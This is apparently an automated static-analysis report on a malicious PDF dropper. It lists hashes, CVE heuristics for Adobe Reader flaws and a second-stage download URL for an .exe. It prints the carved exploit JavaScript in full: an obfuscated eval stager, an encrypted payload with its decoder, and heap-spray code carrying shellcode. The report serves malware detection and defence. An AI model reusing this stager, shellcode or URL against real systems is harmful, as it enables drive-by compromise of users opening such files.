Malicious PDF — malware analysis report

Static analysis result for SHA-256 469da45860aa03f9…

MALICIOUS

PDF

40.5 KB First seen: 2012-07-12
MD5: 18ff9a258a2e5e3e30c3132445dcea4e SHA-1: ba8c50f18bc7eb7d1db81a0556e37aae1ffac868 SHA-256: 469da45860aa03f9ab8ad781589ea04ec51781fb1a379d2e8702e52de1681536
570 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1059.001 PowerShell

The PDF file contains embedded JavaScript and U3D content, triggering critical heuristics related to CVE-2007-5659 and ClamAV detection (Pdf.Dropper.Agent-7256570-0). The embedded JavaScript, particularly the deobfuscated files legacy_pdfkit_stage_000.js and legacy_pdfkit_stage_001.js, is indicative of a dropper mechanism designed to download and execute further stages of malware. The exploitation of CVE-2007-5659 via the Collab.collectEmailInfo method is a known vector for initial compromise.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 14

  • Adobe Reader U3D auto-activated 3D annotation — CVE-2009-3459 critical CVE likely CVE_2009_2990_U3D_AUTOACTIVATE
    PDF contains a /Subtype /3D annotation that is configured to auto-activate on page view (/3DA <</A /PV /AIS /I>>) alongside a /U3D stream and JavaScript. This is the document shape used by CVE-2009-2990 (Adobe Reader U3D CLODProgressiveMeshDeclaration heap overflow, APSB09-15): the U3D parser runs without any user interaction once the page is rendered, while the accompanying JavaScript prepares a heap-spray to land controlled memory inside the corrupted allocation.
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • Adobe Reader U3D CLODProgressiveMeshDeclaration exploit critical CVE likely CVE_2009_3953
    PDF combines malformed U3D 3D content with JavaScript/action activation. CVE-2009-3953 is an Adobe Reader/Acrobat U3D CLODProgressiveMeshDeclaration array-boundary vulnerability triggered by malformed U3D data in a PDF.
  • U3D/3D content in PDF — Adobe Reader 3D parser CVE-family indicator high CVE related PDF_U3D_CVE_RELATED
    PDF contains U3D (Universal 3D) or 3D annotation content — CVE-2011-2462 and CVE-2009-3953 are critical vulnerabilities in Adobe Reader's U3D processing that allow arbitrary code execution. U3D content in PDFs is extremely rare in normal documents.
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB09-15 patch-range version gate (CVE-2009-3459) high CVE likely PDF_JS_ADOBE_APSB09_15_PATCH_GATE
    PDF JavaScript gates the exploit payload on an Adobe Reader version range that exactly matches the APSB09-15 patch boundary (< 9.2, < 8.1.7, < 7.1.4). That boundary fingerprints the CVE-2009-2990 / CVE-2009-3459 U3D parser vulnerabilities — no benign script tests all three Reader version-points together.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var gRcn__Y1f = new Array();var TnB_r_25vQ = 0;var rW5p7_hCc_TQ = "";function tH_3c_08Q8e(WxO__1gSRKK, V_E6lr){var CW_caxkvema = V_E6lr.toString();var ol_67Y__C_n_h = "";for(var t11Nj_e7_1ks4d = 0; t11Nj_e7_1ks4d < CW_caxkvema.length; t11Nj_e7_1ks4d++) {var VI2GdtR = parseInt(CW_caxkvema.substr(t11Nj_e7_1ks4d, 1));if (!isNaN(VI2GdtR)) {VI2GdtR = VI2GdtR.toString(16);if (VI2GdtR.length == 1) { VI2GdtR = "0" + VI2GdtR; }else if (VI2GdtR.length != 2) { VI2GdtR = "00"; }ol_67Y__C_n_h = VI2GdtR + ol_ …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Dropper.Agent-7256570-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Dropper.Agent-7256570-0
  • Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT
    A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
  • Annotation subject percent-decoding eval stager critical PDF_ANNOT_SUBJECT_MARKER_EVAL_STAGER
    OpenAction JavaScript forces annotation enumeration, reads an annotation /Subject payload with getAnnots(), rewrites marker bytes into percent escapes, decodes it with unescape(), and dispatches it through eval. This is a high-confidence exploit-kit staging pattern. It is intentionally not mapped to CVE-2009-1492 unless getAnnots() itself carries the crafted integer or long argument shape for that vulnerability.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://phjuibqpoxk.com/nte/prox.exe/yH8d9eef0cV0100f060006R06330f21102Tc19921ee203l000c Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x1A4 343 bytes
SHA-256: 1847af0a099665b6ac45af66402e56ed64237a1b287618ee3d6643267fda6f35
Preview script
First 1,000 lines of the extracted script
em = ''; r = (r = 'l' + 'a' + em + 'ce', 'rep' + r); if (r && !em) {var z; var y; th = event.target; z = y = th; 
	 y = 0; 	 z['syncAn'+'notS'+'can'] ( ); y = z;var p = y['g'+'et'+'Annots']( {  nPage: 0 }) ;var s = p[0].subject;var l = s[r](/k /g, 'q%p'[r](/[qp]/g, ''));s = th['unes' + 'cape'] (l) ;var e = th[em + 'e'+ em + 'v'+'al']; e(s);}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x2F7 13160 bytes
SHA-256: 5b9bf41eb38b2a81712d48474e0d298c04495e52c69826e5bd337397fb47a529
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function x6_N_io4_T8g(HJ4R__J70Hm, trHQbA){  var C_K71_Vi20nEDjv = 'um' + 'en' + "ts";C_K71_Vi20nEDjv = 'a' + 'rg' + C_K71_Vi20nEDjv;var x67k6__dv_G = x6_N_io4_T8g[C_K71_Vi20nEDjv]["c" + "a" + "zzee"['r'+'epl'+'ace'](/zz/, 'll')];x67k6__dv_G = x67k6__dv_G["t"+"oS"+"t"+"r"+"ing"]();var AEv2_O1 = 0;try {if (app) {AEv2_O1++;AEv2_O1++;}} catch(e) { }var AKV6_U__4UF6 = new Array();if (HJ4R__J70Hm) { AKV6_U__4UF6 = HJ4R__J70Hm;} else {var So_kdn_07036kaq = 0;var Ku_0_7__thMh = 0;var l5b81__f = 512;var hAkv8_BQ_5w = 52;hAkv8_BQ_5w = hAkv8_BQ_5w - 4;var aF83i6EJ_d = hAkv8_BQ_5w + 9;while(Ku_0_7__thMh < x67k6__dv_G.length) {var rF__T6sl_8_VGe = 1;var GYcmDn = x67k6__dv_G['c'+'h'+'arC'+'odeAt'](Ku_0_7__thMh);if (GYcmDn <= aF83i6EJ_d && GYcmDn >= hAkv8_BQ_5w) {if (So_kdn_07036kaq == 4) { So_kdn_07036kaq = 0; }if (isNaN(AKV6_U__4UF6[So_kdn_07036kaq])) {AKV6_U__4UF6[So_kdn_07036kaq] = 0;}AKV6_U__4UF6[So_kdn_07036kaq] += GYcmDn;if (AKV6_U__4UF6[So_kdn_07036kaq] > 512) {AKV6_U__4UF6[So_kdn_07036kaq] -= l5b81__f;}So_kdn_07036kaq++;}Ku_0_7__thMh++;}}So_kdn_07036kaq = 4;for (var y___03_7_K7i = 0; y___03_7_K7i < 4; y___03_7_K7i++) {if (AKV6_U__4UF6[y___03_7_K7i] > 256) {AKV6_U__4UF6[y___03_7_K7i] -= 256;}}var C344__ty_0 = 0;var y8WgUe = "";var P0LT_Wy = 0;var jnpj_5y_fWMv = 0;var kM2__D8AW;var g3dn2_oDa = 0;while(P0LT_Wy < trHQbA.length) {var O680_aDgVY2 = trHQbA.substr(P0LT_Wy, 1) + "Z";var oaIW1fq_emo2 = parseInt(O680_aDgVY2, 16);if (jnpj_5y_fWMv) {kM2__D8AW += oaIW1fq_emo2;if (C344__ty_0 == 4) {C344__ty_0 -= 4;}var Ug76_c__7x = kM2__D8AW;Ug76_c__7x = Ug76_c__7x - (1 + g3dn2_oDa + 1) * AKV6_U__4UF6[C344__ty_0];if (Ug76_c__7x < 0) {          var q4Fe_S2 = 256;Ug76_c__7x = Ug76_c__7x - Math['floor'](Ug76_c__7x / q4Fe_S2) * 256;}Ug76_c__7x = String['from' + 'CharCode'](Ug76_c__7x);if (AEv2_O1 == 2) {y8WgUe += Ug76_c__7x;} else if (AEv2_O1 == 1) {y8WgUe += oaIW1fq_emo2;} else {y8WgUe += P0LT_Wy;}C344__ty_0++;jnpj_5y_fWMv = 0;g3dn2_oDa++;} else {jnpj_5y_fWMv = 1;kM2__D8AW = oaIW1fq_emo2 * 16;}P0LT_Wy++;};var abcd=0; ;var gQ_P_x = this;gQ_P_x['ev'+'al'](y8WgUe);}
	x6_N_io4_T8g(0, "4C6DAEF3E96EDB1D8D8B0DBC405C2D87F4B1A36373CEDA805794CD3600DD52F78AFA5E1254FB8AC404FDB4A85AEC0BBD473E2C95E911B8369D54C73E495011D7D32C1EB57D82ADDD51A0DDBA085C246FA57F4F62229479170394BB3399DBFFC85DDF2EBEEDC838A5ADF18A976CE50B7D073EEC26A93B6B207657BA00175DA0B476621B9838886A5D229B877FCCA5DE4E2E75E73913CE080ECACB5AB263DBBF9A15FAFB9B82D9F83130E77A5A2CE4C628D8EC00D4432A32DE2323638CD56F749B36499C43FD3C2C209F7A5E2A7F738FD831BFA0E79298C8A275CB479C42E7967CE3ED8A5F870AFF4336E7F41FABED5EF1853183C20347FB73E217EF444A777658482C921CB463DC23804CF1AB4A9D62DAEB959AB75A9FBF7E41CD1C6600E14D3864FF91155510CAB702DDC5B9A41B357E45FD7796C640741F6F15AD165362E0DFB7756FE1A36A60C5375EBBAF0E8ED95066C7424C24A38C53F08CA1DBA0C5D2DE5A002EA1160B6BC3C015C29222EDC630E13532037A3251F14550B8EDD868E5E5BD8024733F591860D74CAF2BB085A22E6AC0FEE3EF7C0ACF808C4F9B60C5929E1A00EE6E82193D7B8111345420DC781DAFFED307862EF6EB235A6BCFD21C6174363EA5333D3C0E38A073583F6C5C6DC7E87C9CA5AD7C25CE8ACB1A7223DB7F5AD5FABB5B42D9B82517DE1B0FEE0E30B2463BB8C20813E19EDD2F238989643B745383A43CEE81A01E9A8BEAC2339B4FAAE5BA8BAB60C8CD8D45E00C1BC69C180056073C224EFB8EC6E70BF3AE992A2FAF06092C45C2FE682A5E5BF03A20331916F54F5B01A184738F6BA2D5BDBAB000799A9B20392AAB7FFFDB8CBB3399DBFFC85DDF2EBEEDCA8CBEA120C6946823B838DCF5074CB8FC30334E3E98EADE32B8C6AD3A28B870836C97CE69712B8B65906226C0FC1506AB1CD596BB7B9B479C8287D8ACC753D6EC2A635DE04A2309138BE7E331F81677FC31E5DE1478ABBC508F6B4C44CB6AF0881D5DD5A05CEB3B7950D9EF6CE7A3E6ACFAB36DA01A7319D3405496AE8C2344D7B84C3D1833E1B1156FE6692BBAC23AFCC55FA01FE63B551C744728608B07B854C7064E57D4AD2A5E1092A6BB98A26893C17E3DAF0369E9E41B499B00912550BCC7FBEDE2CBC4991B13A6542B745E0F42BD6DA160ED4A581C2816F54060FB929589B65F7BAC82C2A8E1867EBE4B623B884838FDA296FCB2E1D4E757F240A3EBCD41CAC40DC64B5E2DEF48EA3FEC20724A6D361E2DB60D0B75A8997835F7C9638E189BE0A393558D88CF5D746CE9E31E8D47D7D0CB83C445F2C1C9D6FBFD67C8CD376171DE4F5420DC78EFD52DC009433B1AE2F00C417BD62D9F6F886BDB5CF0881962E275622F7FB47F0DEE6E91F8A28CCA88478C0578EAA951409607C55942C407300212050ACC1F42A751EC82830F19A8ABAF4BFC8D895B49254271AA3AF684A1CFA99025EA1B8063C2B6A94C8052C8997E16DE035AD3AA534C98FF90250A0BB9C3F4DDF3BD9DEEF07206003843C405836B7063E3251D481F2D042C39B3AE4D97A7608BD394C8AF2589B9C05E6C60C3500FCA8CD31C7EE2D1F648EF0E9CDD1995BEAFE0BA5C590EF339C609EC148D4277311E14B8CCDB4AEAD6BB431B846D8F2C93CE69543B955CE418379A1622179347D0C9DF58DF2AB880B015C2CE74CA010C5F6F12781B03ED7E33CB3AF3177A17E8F3EF1D52C5C96177964777EF472647E3188EA76A2C8C5C9F1725ABCBF1E1D207C48AD2438AEAB94070D5C28E348A01CC1F2F1238DBC3ED3EEA8E2DBEA64140ED80F214384C5B4A6A563B439B04ED8FAC13575A28FA2DB062D0F4B354746885A388448CCC6AFADB3F36A4FB92124708BEEEDDDA00D0A82344AF06094943C305687A5E5BF43A495B2E260C6B61FFA87B878F2B4C967BBC5CDB47B5BC4B6251CA9755FDD1D021A9CBDBB773F04DD2E3E08BAABD0D88912B1BE26AD829EC20724B781E5D4BB20A205BE5E3BC6B0B8E717D2C95DF8B866E8C679B2283C0DDF400C6470495CB55E67DB0C477F3AC00A4C1DD1C8269DC71192621BE2EDA34ACE2320CE8B9DE1D3FBFDB5B817B8967EB74F682E94EC08F26283A7950C9F67C8EBED6CD07A062DF3FAA2BB08648D5DEBF2542C7B8002BCC11CB9CEC40A9613BAD97380DE791E11EE446671C32323F725CFBAA80E90E6F7027B946A15ECEFAB44C7052D099502CD60360C1DB1142A9C080DC02C178C1B7CC0FCFAB1B118B59277B84C642795E904FB6380A39E0D9C63C1ECEBF93A0D85A919CBFCB6DFE91A5B1236223C79B13028CA0DBAEEDFFD83AFF0ADF070A7FC3B6D574A666EE0766F0FF1842C84A28EA3B0C66C01F1EA0A276702DB243606B8A225D6559C49BD51E657D1736E6C008CA7E9D819B359CC4C815CDE0A6BD1009405C167350F11B8132D900F0004D50F9B00C5663C0A15B71A28940E033ED59D821A9A960FD919B7ADA12ABE2F19287E57F4091596BFAAC5039B1FEC167970E06EF3ADE4B0AC4EF5CE69C3A87E03851F6A2F25533894A476258353E9B48AA83BBE28D8BEABC0F88639BDA81586381B5C76F3DA1D569B3F7573F9FF881D30A039BC2ED0BCA9C6F08437B3A013A8FF74AAF73A616B61739551F07F5412D016B3CB3D6315FD3AAD06DE573B9804038128765FF05AF971AA9B2D1CC42FF10C7D7D795B691DFB38A30EDC5531900201872192826411FA3FAE02DB5C3C9401088308F6D9121A0A674C8A39817329B052202BB1DD0CC9B56A445EEC5CB2BFE0A53C9DF0B6E6DE24520062F841B9B070909874A2BF3275B727BB96E81697544DB7F1051F0249F8B67F35DB293D725A0DCDAD1CDD47F67A44A9A1CF37F88A2AC9D5289D4E0442D0B3322AAE58BFD873E6CAE2B30F5ABB24B344B6D4F2034F63CB403E54CDBDF915C17C6509D6287ED8F5FA2919299542ADFD84FBF9C1DF7ABFA812645FDC8F4B6F5CCD1990E47A657F54799F34E68589D22B61C5261F407F77260C38B4D58AC0EA0BCAACD9F0F577E9D24681A9F9E42CECBB82BA1DB11C316CD3BDADAE48DAEAD0BCB5B23F7066818EC1714A41258351E2964101861F3DAB77C217B24416D68DE656430CF75A020367121FCE29518C4D39E55E06CA1D5B9EEC1D558D7D508443ED18924EAF180ECDB02EDD843013DB2F1526A80DF32749B7831F145F554F114E35C26017B61A5DF2881A5A8E7C2DBC580915972FFDD863CEBF2C22359C10D0504110BD0EF1F72BF57F1C1933842EE64F351264F5D21755C0E71A0F8F782DE138F5129F140A2568CFB7C8F799381DD5740A1DD20FFAC43076AB191151AFE89B403DCC8A36DE145771CFC444807147B347611F90C1A5FF4DC0B3F2FC87241ADD2218FA46DC3772688B86C583451949A3EFDB584F86A9EC50C2FBC11A3C711517F83DC79A033ECC537CB410513870C2ADF290C66C01F35B0B08631318C32552854236564448A61E5203685DCE8278D1D04979199AB3AAC917C2BC1026392C14D703FE248102FEC80FA96F101D3420CF8A433203493CC21B56F783CDF38374D1B269E5169037C9D94CC3B7E9CB9AA811D9682A414603FAF5347D9B1D12355D3CCF4431136E4B0E185BF88327F88470CC075B61139816134621C4B3C7009E341ED146661EDB04F6C20C8BF71A173628C984453D2DD60BCA1550D9CC254D857CC88C5F3D109A172EC006C5B033E5AC701BD35A222E7005F6226ECCA3171CBA44D6E946391ACB0D261255776851F28678C580FCE91D91F81B402BC6BC40CA7D9C18D7F7EDFBA506F22F13EDBF1411889103FE4732474CFE121F5A7863F227877825966E351A970C074D20C7B7FDFF818815DD78FCF5DA07FAD90BC19B1116392CC093483E4761BEAE1C5FF9930EFC8870C2BE2F11179909C31715C8B42B448F5412D1F9F5C28F08F6C60D7F671E1B8A8C20E8493A1456B2DA1954CA7C1951897D4FA0400D149E0ADEC42AC9B047C970501FD6FAE1F26409F62612E0B31B10AE454A9D4A35E19F13D61659DE9826068A7939D5541911933BDAC13FCABBC541844C1CDBFC1E4CD90AFF003AA1DF18155F70C7C24B322E7111E21351ACC425FB8B74C70A32151E980FC6CE04CBBAF1D3B53819D12CE9C98E0BFB0D5CF2EB151A6D5CC4874C3E1848E2AE1053CD901FC08C71138F43511B9D0E062E69CCB44EF8432416D5FDE926C30CF6DD41E3B7121F3E39249C4D3D186B33DA1D5BAEDBCFF58D7D30A3F41D18921F1F285ECDB2FC3DA45013DAFF2203780DF33726E4C31F146F44FEB14E360272E5161A5D9F67CA4A8E793DB9182915970FDAE503CEBC1925988C10D042FDC08D0EFF443BC5FF1C193063FBA64F324F44F5B217527063F9DF8F755DCE6635129C010A2568CFB815D736A81DD5740A1DA20FFAF430E6BB191EA16D4BAB403E3CC9E6FE145AD1BFC3F480714AA347411F90D1A33F6DC0B7231C37541ADD2275FA7700F70E15B7F71613325BD8C04139F971E7FA115C75CF03E9817CD48B1B3D1C9912CEFC82C1BFC041A86017D22604F75C01F2CB3A7BA3131873280595423926570BC61E5186C7F0EE827C11FD6939199B36CB1C57C2BBED068C7C14D7372DC47102FF4B2FD9CF101D7740C2BA433216993CC21B567493DDF3837541A53D25169037C6C64CC3BAFA1B3A5811D9483CD46603FDF534CAFB1D1585801D0F443123A11DFE185BF8B32B288470CED73E31139546261631C4B449D39E741EDE6935C19B04FA122CBBE71A17665939B4453A4055EEBA1550A6CC17ED857CEBEC0EFD109A26EF3006C5B034457C401BD2F6E20E9005F33F4EDCE3171CA72536C94635EDA7EFB61255E767E522867928915D691D9F183B3D5BC6BC30DA9D4C18D85B4E384506FF2F23EDEF14119850E6DE47322A8D11021F5ADBB3E227877522D66E251A9428A6ED60C7B8212FAE4815DD1C3A35CA07FB3988DEBB11165C8D20D3483E04C22F3E1C5FD9AFFC4C88712FDB2F7117991A032755C8B42AF46F2412D229E612AF08F6F60DAF771E1B9A88FD884939F1A6EFAA1954AA6BF8C1897CFCE02FED149DEAAF142AC9BFF7F960801FD72AE1FF7409F2F322D0C31B106B34FA9D4A35FE6BE0A61659DB9816068A78FA1520F91192EBCAF19FCABC251E613C1CDC2C0E2C990AFEF037A16F18156C212AB24B31FB40E1A2135E7C6422FB57D7DA8DF1C94D381CE710F86936C292367CA8D5201CDD42072E4FFF62AF044C31BED5FC09DE48B5366EDEF3F182B2B2C7EFC611E341E85030F30D0D8BC70EC9C3345216A248DA62BB19BCF463B8F0B14D29908CFD6A054AB3AAC90922CED0E53BBCD0F683FF35953DAF97012971EC2F3880A34E42C5378C38A2660695182DD85E26B114EBE8B29FC885C6DC71DABCBE2A79F07B03E99046323AD5770A7D3A15B4DCC100206D50F12BDEF6FE65CFD81AF4510DC749E29E4668C5D5F293581643AC54FD70E645DE9D74D70449CB26C7B9C91ACC7540FDACD3600DD52F78FBC7B1226CEC1F9D9CCD18B6207299B53384082020C8B525E19A40B6230F0E7C63C2CBC717397CE4D61B7AAEB771696B86C147953CE484316A3D2117DECD40C16C9FCA3DDBC7CC7851AAA5E6AF00527E2EC2513B13B4CF167568FD6CA60F8AEC462EFC33691235AD74CAF72AC9FDE4665A5DD290DC060D6CCC257EB3EF1BD77F3AC037695FB37453FE1605EEE1085E791ECD7D4641218F5F96981C1DF6AA3AB7F7BEA332F7B1731CF5E3FF343B7A608386CD9C7C59107D16BDD59723CE46737B3AC7E155D020741EED448DCAB0A7AE68B03AB943D4FBCA39E29E44B651C7428075AA632E753D7E0999FE8EFFA781098B8874CB7638DB6893DD1DB5ABBE7530B9AB747DC0217C5D3E1E1F3DD872D457E58345343BD196874AC51F73E4B6C25DFB83171C3A54C9B94635CD77BFD5ED962C3C24D7512CD793EF6CBC31AA9DBE6F655C3FCB0C2BE3A8AB41BC64B2230C138F4362B48893B392A7120A8BBE71CB0B27680ED8450865794E58B6576CD70D407426CE3F8E29708138F9D72E569E197B6E7F70F67C6C703382E27853C1914AF26C52BEBE9713BFF9FE92924C8AE4F75968859ED88F98E2036A9A9683383AF5E0A35B8D8E4D4AF1CCE90D10478EABF8F83E2EDBE21850B043B330F48F0E71D79F36F3AB2D2FA57FBB4E056FE3B4C1E2C17437FA30DA28DC90E868B13EA399B36C6E583A96C6DBDD88F0CCF1060EBEE3440A3F16B2856C4ACFDD00B06CA6CF146980F078989074AAB73A75BF2FB3B341F2CCB842CF2A583A0973F7FBB7BF26D0F98B7AB3C625B91930819E2C52D6AD3D40964FA3BECF9DE4A90B6E3A59D1AF9B05B140E2B55B10E3D354F27AD01CA24A8C8A953ECAB337B69A00D7C93748FA79025436CE4E3D88208F0B1B354D33BDBD1C815DCFB9C9707F84B2EE4421CEBE57043E2ECDDF6590C20B01D5D75BABA5BA96C812CB833F94AE9188EA7433D5B6E8FDF25B8BAB8AA91D9BE9194166EF69C423CEBBCBF2385C10DFF31DC37CDA6DC61DA6DFCA494314DF99ECE4B2D5095253B58467C6A3DEF4CC0E47A4CF1AB479B4FA9E77E777E86CAAA7E50CBD63000CD001456ED8C23100FBD03E21501D08931446F082D7C93C046B52F8621D003131EECD7C735371062859E8F167DC792CA94E186B7BD4B5351C55D4ABEA884F278ADD2C0160742E810FF8CB8BD1A74A14131E8571B024242981238F25D1D6CC4CA77F4E9CF2C37A2745D2A8EE68BA0598F74A51865BFD4F5E48808C183E154DE3ADF85CCE6EFCC9684C8F86061F34443EB1BC138C51CEB0C4747F1BA344D767BBB5D766F576D9C50E249E867A56F3A0E607F76EB01C0D4ECE58A0FC492AD52A939F0933FC7ED922B63FDC4EF1F0D0AE3BB1D3CA7772D829B133DB45FCF4DFA536B5D2932532C9F34F67FE0D79355D4063DAB5EDAF5B89171A2CED18D52D81223ACDD4E45A5008FD34714BBF4FE20FDDAA8DC35B9583B7E45BB17687CBB62CB50424C35ED0C6B42C9724F97A01655AFC8E9AEF159A5844B6F40916014CFCBD7E37BAFCCB718B151A305CC7B74C3DCB75B5DDEBC27F71F1313AA0D67306F4B94FA1331EBA0917522732A732CA11C9A9384B17EA2286E83FD35DB7C6300CEDC52DE76E1C1C90AF50998B1114C3765E08659281BC91EA8FECD0B492D3AA8F96981D1CB6E60787573B45B377B174EE55C14083A6C6B1D27BE8CF1A7CC07C951CB439EEAB94078E6FC8A638E11FF183C1F0F11E92E30AF9C2DBE83143BE772AE1C0C7A8E655F5A2C525C10A24CB3CF708B13BE0A6C38C6EAB58BA688A2885BFEDAD96BE9E6133695EF4A1F470ABF03F6E7B4AD991B037716146B87FB3BAB558417AF040A773618082C62F2B24E7FBE0E6994B9CFAC0F9179AB4B664D9E873ED19C9403A9E009F659E222D0D0127DC1C115C3993525F627CE322B53842357DF3C0C85FA1134C8ECB56B1BCA324518AACE6D93729284E54665AB23F3D2990805BDDC56C259B780D433F502538AFD487F3C227D503121C21DCB3EFF0C814AE8BCFB0C3D899B2C73573C329C542183F037E38B532A916C50E3E6859AB4A585C8DA5FCB4B7312F17F76D5038C135FBCD1FDFFDF0F28E32230AF47F48DC23914D0B4DD4B23925A1C3C170F2CB84FA25DD716667429EA399B6797A68A69636B8A9A48FEE8201BAA9C00F85ECD7B1A1AE4CDEEED0B0B9B5AF8F07F06488843D33BAF378661E33A4973F0D7D4491CCB704D6F980EA8F06BBA5CD0486E8D4B6A2AA49D3EFDCBDBEB6AB8C0CE16085893E3FB7F879621B38A5933C027E409EC1A800D3CE8270CBFECE25BF5ACCE3C1BB6698420700D936C53CF9BCF467D7CD5FE2F");
legacy_pdfkit_stage_001.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x2F7 5525 bytes
SHA-256: 5cd5457c46d0b5b3ad4921e41a1583f396bbcf09f9136d8a8d6cb19ee1953aed
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var gRcn__Y1f = new Array();var TnB_r_25vQ = 0;var rW5p7_hCc_TQ = "";function tH_3c_08Q8e(WxO__1gSRKK, V_E6lr){var CW_caxkvema = V_E6lr.toString();var ol_67Y__C_n_h = "";for(var t11Nj_e7_1ks4d = 0; t11Nj_e7_1ks4d < CW_caxkvema.length; t11Nj_e7_1ks4d++) {var VI2GdtR = parseInt(CW_caxkvema.substr(t11Nj_e7_1ks4d, 1));if (!isNaN(VI2GdtR)) {VI2GdtR = VI2GdtR.toString(16);if (VI2GdtR.length == 1) { VI2GdtR = "0" + VI2GdtR; }else if (VI2GdtR.length != 2) { VI2GdtR = "00"; }ol_67Y__C_n_h = VI2GdtR + ol_67Y__C_n_h;}}while(ol_67Y__C_n_h.length < 8) { ol_67Y__C_n_h = "0" + ol_67Y__C_n_h; }var tPRTO468OW = WxO__1gSRKK.toString(16);if (tPRTO468OW.length == 1) { tPRTO468OW = "0" + tPRTO468OW; }else if (tPRTO468OW.length != 2) { tPRTO468OW = "00"; }ol_67Y__C_n_h = "3" + tPRTO468OW + "P" + ol_67Y__C_n_h;return ol_67Y__C_n_h;}function h__4dhPyQGqO87(l1_8r__I, Y_62Ahe4Pafd0I1){var dq_ADs = new Array("");var l2w_J3L_vn = l1_8r__I;var oa4f1_Rc2;if ((oa4f1_Rc2 = l1_8r__I.lastIndexOf("%u00")) != -1) {if (oa4f1_Rc2 + 6 == l1_8r__I.length) {dq_ADs[0] = l1_8r__I.substr(oa4f1_Rc2 + 4, 2);l2w_J3L_vn = l1_8r__I.substring(0, oa4f1_Rc2);}}oa4f1_Rc2 = 1;for (t11Nj_e7_1ks4d = 0; t11Nj_e7_1ks4d < Y_62Ahe4Pafd0I1.length; t11Nj_e7_1ks4d++) {var op___nov_elf_O = Y_62Ahe4Pafd0I1.charCodeAt(t11Nj_e7_1ks4d).toString(16);if (op___nov_elf_O.length == 1) { op___nov_elf_O = "0" + op___nov_elf_O; }dq_ADs[oa4f1_Rc2] = op___nov_elf_O;oa4f1_Rc2++;}t11Nj_e7_1ks4d = dq_ADs[0].length ? 0 : 1;dq_ADs[oa4f1_Rc2] = "00";dq_ADs[oa4f1_Rc2 + 1] = "00";oa4f1_Rc2 += 2;if ((dq_ADs.length - t11Nj_e7_1ks4d) % 2) {dq_ADs[oa4f1_Rc2] = "00";}while(t11Nj_e7_1ks4d < dq_ADs.length) {l2w_J3L_vn += "%u" + dq_ADs[t11Nj_e7_1ks4d + 1] + dq_ADs[t11Nj_e7_1ks4d];t11Nj_e7_1ks4d += 2;}l2w_J3L_vn += "%u0000";return l2w_J3L_vn;}function Kba_2_u(gC3__615Ls4T5, OY_P_51n){while (gC3__615Ls4T5.length*2<OY_P_51n) {gC3__615Ls4T5 += gC3__615Ls4T5;}gC3__615Ls4T5 = gC3__615Ls4T5.substring(0,OY_P_51n/2);return gC3__615Ls4T5;}function OrA2_8_lN5851_s(Cvc0_TpW_q, I8f_Rw_q, A_g8Hu___w0){var KYTml4_p0CS = 0x0c0c0c0c;var gC3__615Ls4T5 = unescape(I8f_Rw_q);var Y_62Ahe4Pafd0I1 = tH_3c_08Q8e(Cvc0_TpW_q, A_g8Hu___w0);var K1R6Pv = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var l1_8r__I = "%u9050%u9050%u9050%u9050" + 